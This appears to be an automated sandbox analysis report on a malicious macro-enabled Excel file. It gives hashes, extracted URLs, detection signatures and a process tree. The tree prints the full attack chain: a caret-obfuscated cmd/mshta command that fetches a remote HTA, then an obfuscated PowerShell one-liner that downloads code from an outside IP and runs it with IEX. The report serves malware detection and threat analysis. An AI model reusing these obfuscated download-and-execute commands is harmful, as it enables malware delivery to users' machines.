Analysis
-
max time kernel
10s -
max time network
48s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
19-01-2022 12:21
Behavioral task
behavioral1
Sample
2357791489929.xlsm
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
2357791489929.xlsm
Resource
win10v2004-en-20220113
General
-
Target
2357791489929.xlsm
-
Size
114KB
-
MD5
59bb12f8b33655197b483c1612fdf069
-
SHA1
c676bb82a91acfed31a84ddc9c7835a0cf33414d
-
SHA256
515c9e3ac18310c9234c70c9b9b782b3b7cf48fe16da7547ca683acc944ad997
-
SHA512
4ce89ab6398de3fe479935723875f24b44009018416b936aadeabbf7e76c0d4ec0de9fad8497508d6dc61c46a0d8f5af1ba74dc4374bee4834a707d3e1a9b166
Malware Config
Extracted
http://0x5cff39c3/sec/sec.html
Extracted
http://92.255.57.195/sec/sec.png
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3912 1224 cmd.exe EXCEL.EXE -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 2232 created 3580 2232 WerFault.exe mshta.exe -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 17 3580 mshta.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3596 3580 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1224 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 1224 EXCEL.EXE 1224 EXCEL.EXE 1224 EXCEL.EXE 1224 EXCEL.EXE 1224 EXCEL.EXE 1224 EXCEL.EXE 1224 EXCEL.EXE 1224 EXCEL.EXE 1224 EXCEL.EXE 1224 EXCEL.EXE 1224 EXCEL.EXE 1224 EXCEL.EXE 1224 EXCEL.EXE 1224 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
EXCEL.EXEcmd.exemshta.exeWerFault.exedescription pid process target process PID 1224 wrote to memory of 3912 1224 EXCEL.EXE cmd.exe PID 1224 wrote to memory of 3912 1224 EXCEL.EXE cmd.exe PID 3912 wrote to memory of 3580 3912 cmd.exe mshta.exe PID 3912 wrote to memory of 3580 3912 cmd.exe mshta.exe PID 3580 wrote to memory of 988 3580 mshta.exe powershell.exe PID 3580 wrote to memory of 988 3580 mshta.exe powershell.exe PID 2232 wrote to memory of 3580 2232 WerFault.exe mshta.exe PID 2232 wrote to memory of 3580 2232 WerFault.exe mshta.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2357791489929.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\system32\mshta.exemshta http://0x5cff39c3/sec/sec.html3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵PID:988
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3580 -s 17244⤵
- Program crash
PID:3596
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 424 -p 3580 -ip 35801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:2232